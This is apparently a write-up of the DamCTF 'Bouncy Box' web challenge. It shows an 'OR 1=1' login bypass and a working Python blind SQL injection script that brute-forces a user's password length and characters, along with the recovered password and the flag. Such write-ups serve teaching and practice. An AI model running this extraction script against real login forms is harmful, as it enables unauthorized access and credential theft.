title: Bouncy Box
date: Nov 09, 2021
tags: Writeups DamCTF Web


177 solves / 387 points

Description: This game is extremely fun. So fun that some people have been playing it for over 3 years!

Author: BobbySinclusto

For this challenge, we got a little web game like "flappy bird" in which we have to login to save our score. The first thing that we might think about is to try basic "OR 1=1" SQL injection.


After sending the payload, a new page with the user's stats appear and let us know that we are on the right ways. On this new page, on the left, we can see a "Free flag!" button that will obviously gives us the flag. Clicking on it ask us to login again, but the main difference this time is that the form do not seem to be injectable.


At this point, we might think that it is impossible to login and the challenge is just impossible, but keep in mind that the first form gives us a huge advantage in this situation. Effectively, if we use the SQL injection to dump the password of the user, we should be able to logging and get the flag! Scripting a little bit gives us boxy_mcbounce's password !

from requests import post
from string import printable

url = ""
password = ""

# Getting passwod length
for i in range(12, 50):
    print(f'\r\033[2K\033[34;1mPassword length: \033[31m{i}\033[0m', end='', flush=True)
    username = f"boxy_mcbounce' AND CHAR_LENGTH(password)={i} -- -"
    data = {"username_input": username, "password_input": "random"}

    r = post(url, data=data)
    if "boxy_mcbounce" in r.text:
        password_length = i
        print(f'\r\033[2K\033[34;1mPassword length: \033[32m{i}\033[0m')

# Getting password
for i in range(password_length):
    for elem in printable:
        print(f'\r\033[2K\033[34;1mPassword: \033[32m{password}\033[31m{elem}\033[0m', end='', flush=True)
        username = f"boxy_mcbounce' AND password LIKE '{password}{elem}%' -- -"
        data = {"username_input": username, "password_input": "random"}

        r = post(url, data=data)
        if "boxy_mcbounce" in r.text:
            password += elem
            print(f'\r\033[2K\033[34;1mPassword: \033[32m{password}{elem}\033[0m ', end='', flush=True)

# Outout
# Password length: 12
# Password: b0uncybounc3

Finally, logging on the second form gives us the flag! ??

Flag: dam{b0uNCE_B0UNcE_b0uncE_B0uNCY_B0unce_b0Unce_b0Unc3}